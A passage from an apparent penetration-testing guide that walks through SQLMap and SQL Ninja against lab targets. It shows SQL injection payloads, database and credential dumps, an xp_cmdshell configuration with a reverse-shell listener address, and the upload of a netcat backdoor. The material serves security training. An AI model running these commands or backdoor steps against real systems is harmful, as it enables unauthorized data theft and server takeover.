SQLMap is an advanced and automatic SQL injection tool. Its main purpose is to scan, detect, and exploit the SQL injection flaws for a given URL. It currently supports various database management systems (DBMS) such as MS-SQL, MySQL, Oracle, and PostgreSQL. It is also capable of identifying other database systems, such as DB2, Informix, Sybase, InterBase, and MS-Access. SQLMap employs four unique SQL injection techniques; these include inferential blind SQL injection, UNION query SQL injection, stacked queries, and time-based blind SQL injection.

Its broad range of features and options include database fingerprinting, enumerating, data extracting, accessing the target filesystem, and executing the arbitrary commands with full operating system access. Additionally, it can parse the list of targets from the Burp proxy or WebScarab logs as well as the standard text file. SQLMap also provides an opportunity to scan the Google search engine with classified Google dorks to extract specific targets.

To start SQLMap, navigate to execute the following command in your shell:

# cd /usr/share/sqlmap/
# sqlmap -h

You will see all the available options that can be used to assess your target. This set of options has been divided into 11 logical categories: target specification, connection request parameters, injection payload, injection techniques, fingerprinting, enumeration options, user-defined function (UDF) injection, filesystem access, operating system access, Windows registry access, and other miscellaneous options. In the following example, we will use a number of options to fingerprint and enumerate some information from the target application database system. Enter the following into the command line:

# sqlmap -u "http://192.168.0.30/mutillidae/index.php?page=view-someones-blog.php" --forms --batch --dbs

The command produces the following abridged output:

sqlmap identified the following injection point(s) with a total of 148 HTTP(s) requests:
---
Parameter: author (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: author=-8559' OR 2459=2459#&view-someones-blog-php-submit-button=View Blog Entries

    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: author=-4378' OR 1 GROUP BY CONCAT(0x716a7a6b71,(SELECT (CASE WHEN (6984=6984) THEN 1 ELSE 0 END)),0x717a6a6a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#&view-someones-blog-php-submit-button=View Blog Entries

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
    Payload: author=53241E83-76EC-4920-AD6D-503DD2A6BA68' AND (SELECT * FROM (SELECT(SLEEP(5)))jsqj)#&view-someones-blog-php-submit-button=View Blog Entries

    Type: UNION query
    Title: MySQL UNION query (NULL) - 4 columns
    Payload: author=53241E83-76EC-4920-AD6D-503DD2A6BA68' UNION ALL SELECT NULL,CONCAT(0x716a7a6b71,0x59726867556f476d5157,0x717a6a6a71),NULL,NULL#&view-someones-blog-php-submit-button=View Blog Entries
---
do you want to exploit this SQL injection? [Y/n] Y
...
[11:06:18] [INFO] fetching database names
available databases [7]:
[*] dvwa
[*] information_schema
[*] metasploit
[*] mysql
[*] owasp10
[*] tikiwiki
[*] tikiwiki195

What we have identified are two key pieces of information. First, we have identified potential SQL injection vulnerability points, and second, the associated databases available. Next, we will attempt to dump the contents of the database OWASP10 and find its associated tables using the –D command for the specific database, and the --tables command to identify the tables in the database:

# sqlmap -u "http://192.168.0.30/mutillidae/index.php?page=view-someones-blog.php" --forms --batch -D owasp10 –tables

The command produces the following result:


[11:10:03] [INFO] fetching tables for database: 'owasp10'
Database: owasp10
[6 tables]
+----------------+
| accounts       |
| blogs_table    |
| captured_data  |
| credit_cards   |
| hitlog         |
| pen_test_tools |
+----------------+

[11:10:04] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.sqlmap/output/results-04042016_1110am.csv'

[*] shutting down at 11:10:04

Now we can see which tables form part of the OWASPx10 database. One of the key tables is accounts. If we are able to compromise the accounts, we will be able to manipulate the database as well as continue to compromise other tables. To identify the accounts, we will use the -T command to identify the table, in this case accounts, and the --dump command to dump the table:

# sqlmap -u "http://192.168.0.30/mutillidae/index.php?page=view-someones-blog.php" --forms --batch -D owasp10 -T accounts --dump

The command produces the abridged output:

[11:19:45] [INFO] analyzing table dump for possible password hashes
Database: owasp10
Table: accounts
[16 entries]
+-----+----------+----------+--------------+-----------------------------+
| cid | username | is_admin | password     | mysignature                 |
+-----+----------+----------+--------------+-----------------------------+
| 1   | admin    | TRUE     | adminpass    | Monkey!                     |
| 2   | adrian   | TRUE     | somepassword | Zombie Films Rock!          |
| 3   | john     | FALSE    | monkey       | I like the smell of confunk |
| 4   | jeremy   | FALSE    | password     | d1373 1337 speak            |
| 5   | bryce    | FALSE    | password     | I Love SANS                 |
| 6   | samurai  | FALSE    | samurai      | Carving Fools               |
| 7   | jim      | FALSE    | password     | Jim Rome is Burning         |
| 8   | bobby    | FALSE    | password     | Hank is my dad              |
| 9   | simba    | FALSE    | password     | I am a cat                  |
| 10  | dreveil  | FALSE    | password     | Preparation H               |
| 11  | scotty   | FALSE    | password     | Scotty Do                   |
| 12  | cal      | FALSE    | password     | Go Wildcats                 |
| 13  | john     | FALSE    | password     | Do the Duggie!              |
| 14  |kevin    | FALSE    | 42           | Doug Adams rocks            |
| 15  |dave     | FALSE    | set          | Bet on S.E.T. FTW           |
| 16  |ed       | FALSE    | pentest      | CommandlineKungFu anyone?  |
+-----+----------+----------+--------------+-----------------------------+

What we have done with SQLMap is identified potential SQL Injection points, exploited those vulnerabilities, and obtained the username and password credentials from one of the tables. While this is a simple example, SQLMap has more advanced options, such as --os-cmd, --os-shell, or --os-pwn, which will help the penetration tester to gain remote access to the system, and execute arbitrary commands. However, this feature is workable only on the MS-SQL, MySQL, and PostgreSQL database, which underlies an operating system. In order to do more practice-based penetration testing on the other set of options, we recommend you go through the examples in the tutorial at http://sqlmap.sourceforge.net/doc/README.html.

SQL Ninja is a specialized tool that is developed to target those web applications that use MS-SQL Server on the backend, and are vulnerable to SQL injection flaws. Its main goal is to exploit these vulnerabilities in order to take over the remote database server through an interactive command shell, instead of just extracting the data out of the database. It includes various options to perform this task, such as server fingerprint, password brute force, privilege escalation, upload remote backdoor, direct shell, backscan connect shell (firewall bypass), reverse shell, DNS tunneling, single command execution, and Metasploit integration. Thus, it is not a tool that scans and discovers the SQL injection vulnerabilities, but one that exploits any such existing vulnerability to gain OS access.

Note that SQL Ninja is not a beginner's tool! If you run into issues setting up this tool and using it, read the instructions provided by the tool's creator to make sure that you understand it fully before using it in production.

To start SQL Ninja, execute the following command in your shell:

# sqlninja

You will see all the available options on your screen. Before we start our test, we update the configuration file to reflect all the target parameters and exploit options. First, you must extract the example configuration file, copy and rename it to the appropriate directory, and make a few adjustments to the file as follows:

# cd /usr/share/doc/sqlninja/
# gzip –d sqlninja.conf.example.gz 
# cp sqlninja.conf.example.gz /usr/share/sqlninja/sqlninja.conf

Then, you must edit the configuration file appropriately to match your testing. You will need to uncomment the settings in the configuration file that you would like to have parsed, and replace the settings within the file that you would like to run. The following is an example of some settings that we modified, in addition to uncommenting the appropriate sections:

# vim sqlninja.conf
...
# Host (required)
host = testasp.example.com
# Port (optional, default: 80)
port = 80
# Vulnerable page (e.g.: /dir/target.asp)
page = /showforum.asp
stringstart = id=0;
# Local host: your IP address (for backscan and revshell modes)
lhost = 192.168.0.3
msfpath = /usr/share/exploits/framework3
# Name of the procedure to use/create to launch commands. Default is
# "xp_cmdshell". If set to "NULL", openrowset+sp_oacreate will be used
# for each command
xp_name = xp_cmdshell
...

# sqlninja -m t
Sqlninja rel. 0.2.3
Copyright (C) 2006-2008 icesurfer<r00t@northernfortress.net>
[+] Parsing configuration file................
[+] Target is: testasp.targetdomain.com
[+] Trying to inject a 'waitfor delay'....
[+] Injection was successful! Let's rock !! :)
...

As you can see, our configuration file has been parsed and the blind injection test was successful. We can now move our steps to fingerprint the target and get more information about SQL Server and its underlying operating system privileges:

# sqlninja -m f
Sqlninja rel. 0.2.3
Copyright (C) 2006-2008 icesurfer<r00t@northernfortress.net>
[+] Parsing configuration file................
[+] Target is: testasp.example.com
What do you want to discover ?
  0 - Database version (2000/2005)
  1 - Database user
  2 - Database user rights
  3 - Whether xp_cmdshell is working
  4 - Whether mixed or Windows-only authentication is used
  a - All of the above
  h - Print this menu
  q - exit
> a
[+] Checking SQL Server version...
  Target: Microsoft SQL Server 2005
[+] Checking whether we are sysadmin...
  No, we are not 'sa'.... :/
[+] Finding dbuser length...
  Got it ! Length = 8
[+] Now going for the characters........
  DB User is....: achcMiU9
[+] Checking whether user is member of sysadmin server role....
  You are an administrator !
[+] Checking whether xp_cmdshell is available
xp_cmdshell seems to be available :)
  Mixed authentication seems to be used
> q
...

This shows us that the target system is vulnerable and not hardened with a better database security policy. From here, we get an opportunity to upload a Netcat backdoor, which would allow you some persistence, and to use any type of shell to get an interactive command prompt from a compromised target. Also, the Metasploit attack mode is the most frequently used choice that provides you with more penetration:

# sqlninja -m u
Sqlninja rel. 0.2.3
Copyright (C) 2006-2008 icesurfer<r00t@northernfortress.net>
[+] Parsing configuration file................
[+] Target is: testasp.targetdomain.com
  File to upload:
  shortcuts: 1=scripts/nc.scr 2=scripts/dnstun.scr
> 1
[+] Uploading scripts/nc.scr debug script............
1540/1540 lines written
done !
[+] Converting script to executable... might take a while
[+] Completed: nc.exe is uploaded and available !

We have now successfully uploaded the backdoor that can be used to get s/dirshell, k/backscan, or r/revshell. Moreover, an advanced option such as m/metasploit can also be used to gain GUI access to the remote machine using SQL Ninja as a wrapper for the Metasploit framework. More information on SQL Ninja's usage and configuration is available at http://sqlninja.sourceforge.net/sqlninja-howto.html.